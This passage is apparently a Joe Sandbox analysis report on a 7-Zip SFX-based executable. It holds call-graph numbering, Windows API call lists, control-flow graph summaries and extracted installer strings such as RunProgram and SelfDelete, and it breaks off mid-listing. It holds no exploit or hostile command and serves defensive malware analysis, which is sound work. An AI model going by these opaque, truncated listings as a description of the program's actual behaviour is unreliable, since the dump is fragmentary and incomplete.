5 API calls 11534->11535 11536 409e64 11535->11536 11537 409ec5 ??3@YAXPAX ??3@YAXPAX 11536->11537 11538 409dd3 4 API calls 11536->11538 11537->11539 11540 409e70 ??3@YAXPAX 11538->11540 11543 409c51 11539->11543 11579 411b60 ??2@YAPAXI 11540->11579 11542 409e56 wsprintfW 11542->11531 11544 409ca6 11543->11544 11545 409c68 11543->11545 11544->11506 11545->11544 11546 412315 3 API calls 11545->11546 11546->11545 11550 4113ad 11547->11550 11553 411390 11550->11553 11554 411359 2 API calls 11553->11554 11555 4113aa 11554->11555 11555->11515 11556->11524 11558 411c48 3 API calls 11557->11558 11559 409ac8 11558->11559 11560 409b7e 11559->11560 11561 409b02 11559->11561 11562 409b76 11559->11562 11560->11562 11564 4119e1 2 API calls 11560->11564 11561->11562 11580 4119e1 11561->11580 11562->11527 11562->11528 11566 409bae 11564->11566 11565 409b28 11567 411b84 ctype 2 API calls 11565->11567 11568 411b84 ctype 2 API calls 11566->11568 11569 409b33 ??3@YAXPAX 11567->11569 11570 409bb9 ??3@YAXPAX 11568->11570 11571 409b49 11569->11571 11572 409bcf 11570->11572 11573 409b6d ??3@YAXPAX 11571->11573 11574 409b4d _wtol 11571->11574 11575 409bd3 _wtol 11572->11575 11576 409bff ??3@YAXPAX 11572->11576 11573->11562 11577 409bee ??3@YAXPAX 11574->11577 11575->11577 11576->11562 11577->11562 11578->11542 11579->11542 11581 4119f1 11580->11581 11581->11581 11584 411972 ??2@YAPAXI 11581->11584 11583 411a09 memcpy 11583->11565 11584->11583 11586 4025e7 ??3@YAXPAX 11585->11586 11587 4025ee 11585->11587 11586->11587 11587->11177 11588->11182 11590 403fb2 2 API calls 11589->11590 11591 404e7a 11590->11591 11651 411743 ??2@YAPAXI 11591->11651 11593 404eb3 11652 411743 ??2@YAPAXI 11593->11652 11595 404ebb 11653 411743 ??2@YAPAXI 11595->11653 11597 404ec3 11654 404048 11597->11654 11602 4117fd 2 API calls 11610 404ef9 11602->11610 11603 404f4e 11604 404048 12 API calls 11603->11604 11606 404f5a 11604->11606 11605 404048 12 API calls 11605->11610 11607 4031be 11 API calls 11606->11607 11609 404f6c 11607->11609 11608 4031be 11 API calls 11608->11610 11690 41187c 11609->11690 11610->11603 11610->11605 11610->11608 11612 41187c 4 API calls 11610->11612 11693 411846 11610->11693 11612->11610 11614 404fd7 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 11614->11184 11615 404048 12 API calls 11617 404f7d 11615->11617 11616 4031be 11 API calls 11616->11617 11617->11614 11617->11615 11617->11616 11618 411846 4 API calls 11617->11618 11619 41187c 4 API calls 11617->11619 11618->11617 11619->11617 11721 411743 ??2@YAPAXI 11620->11721 11622 4053be ??3@YAXPAX 11624 4053fc 11622->11624 11623 411b60 ??2@YAPAXI 11635 40512c 11623->11635 11624->11186 11626 403087 ??2@YAPAXI memcpy ??3@YAXPAX _CxxThrowException 11626->11635 11627 411c48 3 API calls 11628 405194 ??3@YAXPAX ??3@YAXPAX 11627->11628 11629 4053cb 11628->11629 11628->11635 11732 4045c9 11629->11732 11632 40529c strncmp 11634 405287 strncmp 11632->11634 11632->11635 11634->11632 11634->11635 11635->11622 11635->11623 11635->11626 11635->11627 11635->11629 11635->11632 11636 40539a ??3@YAXPAX ??3@YAXPAX 11635->11636 11637 40442e 9 API calls 11635->11637 11638 411c48 3 API calls 11635->11638 11639 403087 4 API calls 11635->11639 11643 405348 lstrlenW wcsncmp 11635->11643 11645 402963 6 API calls 11635->11645 11646 411be5 ctype 3 API calls 11635->11646 11722 411743 ??2@YAPAXI 11635->11722 11723 4050d6 11635->11723 11728 404ff9 11635->11728 11636->11635 11637->11635 11640 405304 ??3@YAXPAX 11638->11640 11639->11634 11641 404666 22 API calls 11640->11641 11642 405315 lstrcmpW 11641->11642 11642->11635 11643->11635 11645->11636 11646->11635 11648 411809 11647->11648 11650 41182d 11647->11650 11649 411812 ??2@YAPAXI ??3@YAXPAX 11648->11649 11648->11650 11649->11650 11650->11192 11651->11593 11652->11595 11653->11597 11697 4117a8 11654->11697 11656 404066 11657 4117a8 2 API calls 11656->11657 11658 404075 11657->11658 11701 41170c 11658->11701 11660 404083 11661 4117a8 2 API calls 11660->11661 11662 40408d ??3@YAXPAX 11661->11662 11663 41170c 2 API calls 11662->11663 11664 4040a4 11663->11664 11665 4117a8 2 API calls 11664->11665 11666 4040ae ??3@YAXPAX 11665->11666 11667 4040f0 11666->11667 11668 4040c3 11666->11668 11670 4040f6 wsprintfA 11667->11670 11671 40411d 11667->11671 11668->11667 11669 4040cb wsprintfA 11668->11669 11672 411846 4 API calls 11669->11672 11673 411846 4 API calls 11670->11673 11674 411846 4 API calls 11671->11674 11675 4040e5 11672->11675 11676 404112 11673->11676 11677 40412a 11674->11677 11678 411846 4 API calls 11675->11678 11679 411846 4 API calls 11676->11679 11680 411846 4 API calls 11677->11680 11678->11667 11679->11671 11681 404132 11680->11681 11682 4031be 11681->11682 11683 4031cb 11682->11683 11684 4031e2 lstrlenA lstrlenA 11683->11684 11686 40320f 11684->11686 11685 4032fb 11685->11602 11686->11685 11687 4032c6 memmove 11686->11687 11689 409d67 4 API calls 11686->11689 11706 403087 11686->11706 11687->11685 11687->11686 11689->11686 11717 4116e3 11690->11717 11694 411855 11693->11694 11694->11694 11695 4116e3 4 API calls 11694->11695 11696 411862 11695->11696 11696->11610 11696->11696 11698 4117ba 11697->11698 11699 4117c6 ??2@YAPAXI ??3@YAXPAX 11698->11699 11700 4117e3 11698->11700 11699->11700 11700->11656 11700->11700 11702 411720 11701->11702 11705 4116ab ??2@YAPAXI 11702->11705 11704 411728 memcpy 11704->11660 11705->11704 11707 403092 11706->11707 11708 403097 11706->11708 11710 4116cd 11707->11710 11708->11686 11713 411604 11710->11713 11712 4116e2 11712->11708 11714 411614 11713->11714 11715 41164a _CxxThrowException 11713->11715 11714->11715 11716 41161c ??2@YAPAXI memcpy ??3@YAXPAX 11714->11716 11716->11712 11718 4116f5 11717->11718 11719 411709 11717->11719 11720 411604 4 API calls 11718->11720 11719->11617 11720->11719 11721->11635 11722->11635 11724 4050e4 lstrcmpW 11723->11724 11725 40510f 11723->11725 11726 4050fa 11724->11726 11725->11635 11726->11724 11726->11725 11749 40298d 11726->11749 11729 405004 11728->11729 11730 40500c lstrcmpW 11729->11730 11731 40502b 11729->11731 11730->11729 11730->11731 11731->11635 11733 4045e8 11732->11733 11734 4045de 11732->11734 11757 411743 ??2@YAPAXI 11733->11757 11756 403386 GetStdHandle WriteFile 11734->11756 11737 4045e6 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 11737->11624 11738 404613 11740 40442e 9 API calls 11738->11740 11739 4045f0 11739->11738 11742 403087 4 API calls 11739->11742 11741 404623 11740->11741 11743 404640 11741->11743 11744 40462c 11741->11744 11742->11739 11746 40976c 74 API calls 11743->11746 11745 40976c 74 API calls 11744->11745 11747 40463b ??3@YAXPAX ??3@YAXPAX 11745->11747 11746->11747 11747->11737 11750 4029a5 11749->11750 11751 40299e 11749->11751 11755 4025f4 memmove 11750->11755 11752 4025cc 3 API calls 11751->11752 11752->11750 11754 4029b1 11754->11726 11755->11754 11756->11737 11757->11739 11758->11200 11760 411b84 ctype 2 API calls 11759->11760 11761 401721 11760->11761 11762 411ca3 ctype 5 API calls 11761->11762 11763 40172e 11762->11763 11764 401747 11763->11764 11765 4015ec ctype 4 API calls 11763->11765 11766 411ca3 ctype 5 API calls 11764->11766 11765->11763 11767 401751 11766->11767 11768 40161a 129 API calls 11767->11768 11769 401759 ??3@YAXPAX 11768->11769 11769->11229 11771 401633 lstrlenW 11770->11771 11772 40165a 11770->11772 11773 40386e CharUpperW 11771->11773 11772->11229 11774 401647 11773->11774 11774->11771 11774->11772 11775 401661 11774->11775 11776 411b84 ctype 2 API calls 11775->11776 11779 40166a 11776->11779 11793 404473 11779->11793 11780 405112 117 API calls 11781 4016da 11780->11781 11782 4016e1 ??3@YAXPAX ??3@YAXPAX 11781->11782 11783 4016f8 ??3@YAXPAX ??3@YAXPAX 11781->11783 11782->11772 11783->11772 11784->11229 11786 411a3b 11785->11786 11812 411972 ??2@YAPAXI 11786->11812 11788 411a43 memcpy 11788->11210 11790 411e2e 11789->11790 11791 411e57 11790->11791 11813 411525 memmove 11790->11813 11791->11202 11799 411743 ??2@YAPAXI 11793->11799 11795 40447f 11796 4016d0 11795->11796 11800 40428e 11795->11800 11796->11780 11798 40449e WideCharToMultiByte 11798->11796 11799->11795 11805 411783 11800->11805 11803 4042b8 strncpy ??3@YAXPAX 11803->11798 11811 4116ab ??2@YAPAXI 11805->11811 11807 4042a2 11807->11803 11808 411660 11807->11808 11809 411673 _CxxThrowException 11808->11809 11810 411688 ??2@YAPAXI ??3@YAXPAX 11808->11810 11809->11810 11810->11803 11811->11807 11812->11788 11813->11791 11815 405703 11814->11815 11826 40564a 11815->11826 11821 40564a 11818->11821 11819 405667 _wtol 11819->11821 11820 40569f 11820->11265 11821->11819 11821->11820 11823 40564a 11822->11823 11824 405667 _wtol 11823->11824 11825 40569f 11823->11825 11824->11823 11825->11268 11829 405650 11826->11829 11827 405667 _wtol 11827->11829 11828 40569f 11828->11265 11829->11827 11829->11828 11831 415c06 11830->11831 11832 416828 7 API calls 11831->11832 11833 415c54 11832->11833 11835 415c5a 11833->11835 11840 41817d _EH_prolog 11833->11840 11835->11305 11837 41683a 11836->11837 11839 416885 11837->11839 12285 4163fe 11837->12285 11839->11305 11846 417ea2 11840->11846 11871 41563d 11846->11871 12029 4155c1 11871->12029 12034 415556 7 API calls 12029->12034 12286 413818 4 API calls 12285->12286 12288 416417 12286->12288 12287 416424 12287->11839 12288->12287 12289 41643f ??2@YAPAXI 12288->12289 12292 416462 12289->12292 12291 416509 memmove 12291->12292 12292->12291 12293 416524 ??3@YAXPAX 12292->12293 12293->12287 12301 4072f5 12294->12301 12297 407393 12297->11314 12298 4072f5 9 API calls 12298->12297 12300 4012ac 12299->12300 12300->11319 12302 40731f 12301->12302 12303 407367 12302->12303 12306 411b84 ctype 2 API calls 12302->12306 12304 4114aa VariantClear 12303->12304 12305 40736f 12304->12305 12305->12297 12305->12298 12307 407335 12306->12307 12314 411b60 ??2@YAPAXI 12307->12314 12309 40733d 12315 411d1b 12309->12315 12314->12309 12316 411d2d 12315->12316 12317 407348 12316->12317 12318 411d39 ??2@YAPAXI ??3@YAXPAX 12316->12318 12319 41200b 12317->12319 12318->12317 12323 411f90 12319->12323 12320 407353 ??3@YAXPAX ??3@YAXPAX 12320->12303 12321 411fa0 12325 411f90 12321->12325 12323->12320 12323->12321 12324 403064 CharUpperW 12323->12324 12324->12323 12329 411f9a 12325->12329 12326 411fb3 12326->12320 12327 411fa0 12328 411f90 CharUpperW 12327->12328 12328->12326 12329->12326 12329->12327 12330 403064 CharUpperW 12329->12330 12330->12329 12395 411b60 ??2@YAPAXI 12331->12395 12333 40456f 12334 4042f3 7 API calls 12333->12334 12335 40457d ExpandEnvironmentStringsW 12334->12335 12336 404596 12335->12336 12337 40458b ??3@YAXPAX 12335->12337 12339 4042f3 7 API calls 12336->12339 12338 4045c5 12337->12338 12344 4036c8 12338->12344 12340 4045a4 ExpandEnvironmentStringsW 12339->12340 12341 4045b0 12340->12341 12342 411c48 3 API calls 12341->12342 12343 4045bb ??3@YAXPAX 12342->12343 12343->12338 12396 411b60 ??2@YAPAXI 12344->12396 12346 4036dc 12347 411c48 3 API calls 12346->12347 12348 4036e5 12347->12348 12349 411ca3 ctype 5 API calls 12348->12349 12350 4036f2 12349->12350 12351 411b84 ctype 2 API calls 12350->12351 12352 4036ff 12351->12352 12397 411f27 12352->12397 12355 411c48 3 API calls 12356 403720 12355->12356 12357 411ca3 ctype 5 API calls 12356->12357 12358 40372d 12357->12358 12359 411b84 ctype 2 API calls 12358->12359 12360 40373a 12359->12360 12361 411f27 7 API calls 12360->12361 12362 403749 ??3@YAXPAX 12361->12362 12363 411b84 ctype 2 API calls 12362->12363 12364 403760 12363->12364 12365 411f27 7 API calls 12364->12365 12366 40376c ??3@YAXPAX ??3@YAXPAX 12365->12366 12366->11341 12421 411b60 ??2@YAPAXI 12367->12421 12369 403796 12370 411c48 3 API calls 12369->12370 12371 40379f 12370->12371 12372 411ca3 ctype 5 API calls 12371->12372 12373 4037ac 12372->12373 12374 411b84 ctype 2 API calls 12373->12374 12375 4037b9 12374->12375 12376 411f27 7 API calls 12375->12376 12377 4037c8 ??3@YAXPAX 12376->12377 12378 411c48 3 API calls 12377->12378 12379 4037da 12378->12379 12380 411ca3 ctype 5 API calls 12379->12380 12381 4037e7 12380->12381 12382 411b84 ctype 2 API calls 12381->12382 12383 4037f4 12382->12383 12384 411f27 7 API calls 12383->12384 12385 403803 ??3@YAXPAX 12384->12385 12386 411b84 ctype 2 API calls 12385->12386 12387 40381a 12386->12387 12388 411f27 7 API calls 12387->12388 12389 403826 ??3@YAXPAX ??3@YAXPAX 12388->12389 12389->11343 12391 411b84 ctype 2 API calls 12390->12391 12392 403852 12391->12392 12393 411f27 7 API calls 12392->12393 12394 403862 ??3@YAXPAX 12393->12394 12394->11345 12395->12333 12396->12346 12398 40370e ??3@YAXPAX 12397->12398 12399 411f3c 12397->12399 12398->12355 12399->12398 12403 411dd0 wcsstr 12399->12403 12405 411e98 12399->12405 12409 411eec 12399->12409 12404 411ded 12403->12404 12404->12399 12406 411eae 12405->12406 12407 411ec2 12406->12407 12414 411525 memmove 12406->12414 12407->12399 12410 411f21 12409->12410 12411 411efc 12409->12411 12410->12399 12415 411eca 12411->12415 12414->12407 12416 4119b8 ctype 4 API calls 12415->12416 12417 411ed8 12416->12417 12420 411525 memmove 12417->12420 12419 411ee7 memcpy 12419->12410 12420->12419 12421->12369 12423 411d99 12422->12423 12424 4119b8 ctype 4 API calls 12423->12424 12425 411da6 12424->12425 12425->11354 12426->11367 12427->11382 12428->11424 12429->11427 12430->11429 12457 418eb0 12458 418ec2 12457->12458 12459 418eb4 VirtualFree 12457->12459 12459->12458 13724 419ab0 13729 411b60 ??2@YAPAXI 13724->13729 13726 419aba 13727 4191ee 2 API calls 13726->13727 13728 419ac4 13727->13728 13729->13726
                                                                                APIs
                                                                                • ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z.MSVCRT ref: 0040613B
                                                                                  • Part of subcall function 0040391C: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00406147,?,00000000), ref: 00403928
                                                                                  • Part of subcall function 0040391C: CreateWindowExW.USER32(00000080,tooltips_class32,sfx,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403945
                                                                                  • Part of subcall function 0040391C: GetDesktopWindow.USER32 ref: 00403951
                                                                                  • Part of subcall function 0040391C: GetWindowRect.USER32(00000000), ref: 00403958
                                                                                  • Part of subcall function 0040391C: SetWindowPos.USER32(00000000,00000000,?,00406147,00000000,00000000,00000004), ref: 0040397C
                                                                                  • Part of subcall function 0040391C: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 0040398C
                                                                                  • Part of subcall function 0040391C: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00403999
                                                                                  • Part of subcall function 0040391C: DispatchMessageW.USER32(?), ref: 004039A3
                                                                                  • Part of subcall function 0040391C: KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,?,?,?,?,00406147,?,00000000), ref: 004039AC
                                                                                • GetVersionExW.KERNEL32(?,?,00000000), ref: 00406158
                                                                                • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 00407105
                                                                                  • Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT(00000008,?,00406196,?,00000000), ref: 00411B68
                                                                                  • Part of subcall function 00405502: LoadLibraryA.KERNEL32(kernel32,?,?,00000000), ref: 00405513
                                                                                  • Part of subcall function 00405502: #17.COMCTL32(?,?,00000000), ref: 0040551E
                                                                                  • Part of subcall function 00405502: SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,00000000), ref: 004055A3
                                                                                  • Part of subcall function 00405502: wsprintfW.USER32 ref: 004055B7
                                                                                • GetCommandLineW.KERNEL32(?,00000000), ref: 004061B1
                                                                                  • Part of subcall function 00411BE5: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C17
                                                                                  • Part of subcall function 00411BE5: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,?,00405076,?,00000000), ref: 00411C20
                                                                                  • Part of subcall function 00411BE5: memcpy.MSVCRT(?,00000000,?,?,?,?,00405076,?,00000000), ref: 00411C38
                                                                                  • Part of subcall function 00404666: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,?,74DF1D70,00000000), ref: 004046D9
                                                                                  • Part of subcall function 00404666: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,?,74DF1D70,00000000), ref: 004046F5
                                                                                  • Part of subcall function 00404666: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,?,74DF1D70,00000000), ref: 004046FD
                                                                                  • Part of subcall function 00404666: ??3@YAXPAX@Z.MSVCRT(?,?,74DF1D70,00000000,?,?,?,?,?,?,?,?,?,?,004061CE,00000000), ref: 00404768
                                                                                  • Part of subcall function 00405051: ??3@YAXPAX@Z.MSVCRT(?,?,0041ADC8,?,?,?,00000000), ref: 004050B8
                                                                                  • Part of subcall function 00405051: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 004050C1
                                                                                  • Part of subcall function 00405051: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 004050C9
                                                                                • GetCommandLineW.KERNEL32(00000001,00000001,00000001,00000000,?,00000000), ref: 004061F7
                                                                                  • Part of subcall function 004042F3: wcsncpy.MSVCRT ref: 00404321
                                                                                  • Part of subcall function 004042F3: ??3@YAXPAX@Z.MSVCRT(?,?,74DF1D70,00000000,?,?,?,?,?,?,?,?,?,?,004061CE,00000000), ref: 0040432C
                                                                                • wsprintfW.USER32 ref: 0040621D
                                                                                  • Part of subcall function 004057A2: lstrlenW.KERNEL32(sfxlang,?,74DF1D70,?,00000001,00406248,00000001), ref: 004057E3
                                                                                  • Part of subcall function 004057A2: lstrlenW.KERNEL32(sfxlang), ref: 004057E8
                                                                                • _wtol.MSVCRT ref: 00406256
                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00406291
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00406299
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 004062A1
                                                                                • GetModuleFileNameW.KERNEL32(00000000,00000000,00000208,00000208,00000001), ref: 004062FB
                                                                                • _wtol.MSVCRT ref: 00406413
                                                                                  • Part of subcall function 00411743: ??2@YAPAXI@Z.MSVCRT(00000004,0041E844,004065C3,00000000,0041E844,0041E844), ref: 0041174B
                                                                                  • Part of subcall function 00405401: ??3@YAXPAX@Z.MSVCRT(?), ref: 00405445
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0041E844,0041E844), ref: 004065E7
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,00000000,0041E844,0041E844), ref: 00406658
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$Window$??2@Message$CommandLineModuleTimer_wtollstrlenwsprintf$?_set_new_handler@@CreateDesktopDispatchFileFolderHandleKillLibraryLoadNamePathRectSpecialVersionmemcpywcsncpy
                                                                                • String ID: " -$123456789ABCDEFGHJKMNPQRSTUVWXYZ$7-Zip SFX$7ZipSfx.%03x$AutoInstall$BeginPrompt$BeginPromptTimeout$Delete$DA$DA$ExecuteFile$ExecuteOnLoad$FinishMessage$HelpText$HA$InstallPath$PreExtract$PA$RunProgram$SelfDelete$SetEnvironment$SfxAuthor$SfxString%d$SfxVarApiPath$SfxVarCmdLine0$SfxVarModulePlatform$SfxVarSystemLanguage$SfxVarSystemPlatform$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$\A$hA$setup.exe$sfxconfig$sfxelevation$sfxlang$sfxtest$sfxversion$sfxwaitall$x86
                                                                                • API String ID: 15977253-2458474990
                                                                                • Opcode ID: 596220ad49d5476e6c40ea6e675c02c1c220145f7c39a02eb6dcd5ec7ae097e4
                                                                                • Instruction ID: e0054388adb9e1051384cab39e182934ba2a11f09d439c537bece9ac8bb84f3b
                                                                                • Opcode Fuzzy Hash: 596220ad49d5476e6c40ea6e675c02c1c220145f7c39a02eb6dcd5ec7ae097e4
                                                                                • Instruction Fuzzy Hash: 88929234A001059AEB15BB62DC55AEE3666EF40308F15803FFD06672E2DB3C9D91CB5E

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 635 4029da-4029e9 636 4029f5-4029fd 635->636 637 4029eb-4029f0 635->637 639 402a06-402a15 636->639 640 4029ff-402a01 636->640 638 402d27-402d29 637->638 641 402a17-402a1d 639->641 642 402a1f-402a42 639->642 640->638 641->642 645 402a44-402a46 642->645 646 402a4b-402a57 call 411b60 642->646 647 402d1b-402d23 call 4114aa 645->647 651 402d08-402d10 646->651 652 402a5d-402a62 646->652 655 402d25-402d26 647->655 658 402d12-402d15 ??3@YAXPAX@Z 651->658 652->651 654 402a68-402abd call 411be5 call 411aec call 411be5 ??3@YAXPAX@Z 652->654 666 402ad7-402adb 654->666 667 402abf-402ad2 call 4114aa ??3@YAXPAX@Z 654->667 655->638 660 402d1a 658->660 660->647 669 402ae2-402ae7 666->669 670 402add-402ae0 666->670 667->660 673 402b00-402b03 669->673 674 402ae9 669->674 672 402b06-402b1f 670->672 672->667 677 402b21-402b46 672->677 673->672 675 402aeb-402af1 674->675 679 402af3-402afb call 4114aa 675->679 682 402b60-402b66 677->682 683 402b48-402b5b call 4114aa ??3@YAXPAX@Z 677->683 679->658 686 402b84-402b96 GetLocalTime SystemTimeToFileTime 682->686 687 402b68-402b6b 682->687 683->660 691 402b9c-402ba2 686->691 689 402b74-402b82 687->689 690 402b6d-402b6f 687->690 689->691 690->675 692 402ba4-402bab call 404772 691->692 693 402bcb-402bcd call 4044ea 691->693 698 402bb4-402bc6 call 4114aa ??3@YAXPAX@Z 692->698 699 402bad-402baf 692->699 697 402bd2-402bd5 693->697 700 402cf4-402d03 GetLastError 697->700 701 402bdb-402bde 697->701 698->660 699->675 700->651 701->698 703 402be0-402bec ??2@YAPAXI@Z 701->703 706 402bfd-402c02 703->706 707 402bee-402bfb 703->707 708 402c04-402c06 706->708 709 402c0a-402c24 call 411412 706->709 707->706 708->709 712 402cc9-402cf2 call 4010f2 call 4114aa ??3@YAXPAX@Z call 4114aa 709->712 713 402c2a-402c46 GetLastError call 411bba call 4038fb 709->713 712->655 722 402c71-402c87 call 404772 713->722 723 402c48-402c4f 713->723 730 402c93-402cad call 411412 722->730 731 402c89-402c91 722->731 727 402c53-402c60 ??3@YAXPAX@Z 723->727 727->679 729 402c66-402c6c 727->729 729->679 736 402cc0-402cc8 ??3@YAXPAX@Z 730->736 737 402caf-402cbe GetLastError 730->737 731->727 736->712 737->727
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ab5bfc6fbc337c81536e2efa14fd374f869994e935898830db1c690859ae3586
                                                                                • Instruction ID: c1d5b1038281741182b59f060de7432f6867be05cbf439a176d126074f28f510
                                                                                • Opcode Fuzzy Hash: ab5bfc6fbc337c81536e2efa14fd374f869994e935898830db1c690859ae3586
                                                                                • Instruction Fuzzy Hash: A7B19271900205EFDB14DFA0D9889EE77B5BF08314F14846AF902BB2E1D778AD85DB58

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1140 4044ea-40450a FindFirstFileW 1141 404510-40451e FindClose 1140->1141 1142 40450c-40450e 1140->1142 1144 404520-40452b SetLastError 1141->1144 1145 40452d-404534 1141->1145 1143 404559-40455c 1142->1143 1144->1143 1146 404536-40453d call 4044bd 1145->1146 1147 40453f-404542 1145->1147 1146->1143 1149 404544-404554 CompareFileTime 1147->1149 1150 404556-404558 1147->1150 1149->1146 1149->1150 1150->1143
                                                                                APIs
                                                                                • FindFirstFileW.KERNELBASE(00000000,?,00000000,-00000001), ref: 00404501
                                                                                • FindClose.KERNEL32(00000000), ref: 00404511
                                                                                • SetLastError.KERNEL32(00000010), ref: 00404522
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd
                                                                                Similarity
                                                                                • API ID: Find$CloseErrorFileFirstLast
                                                                                • String ID:
                                                                                • API String ID: 4020440971-0
                                                                                • Opcode ID: 2e532512729200e784fa90409b54c7fc6bc467fc79d1b687fbef4cf578feb42b
                                                                                • Instruction ID: 20dcc56be40bd9a2dd23ceebfaf1f9b55074e9165e79c80e0b63e8a94ab0599c
                                                                                • Opcode Fuzzy Hash: 2e532512729200e784fa90409b54c7fc6bc467fc79d1b687fbef4cf578feb42b
                                                                                • Instruction Fuzzy Hash: F1F081F1A00114B7DB206638AC49BA637A89BC1729F140A77EB26F11D0D77CC945955E
                                                                                APIs
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000024), ref: 00409A25
                                                                                • FindFirstFileW.KERNELBASE(0041E7B8,?,00000000,00000000,0041E7B8), ref: 00409A73
                                                                                • FindClose.KERNELBASE(00000000), ref: 00409A91
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
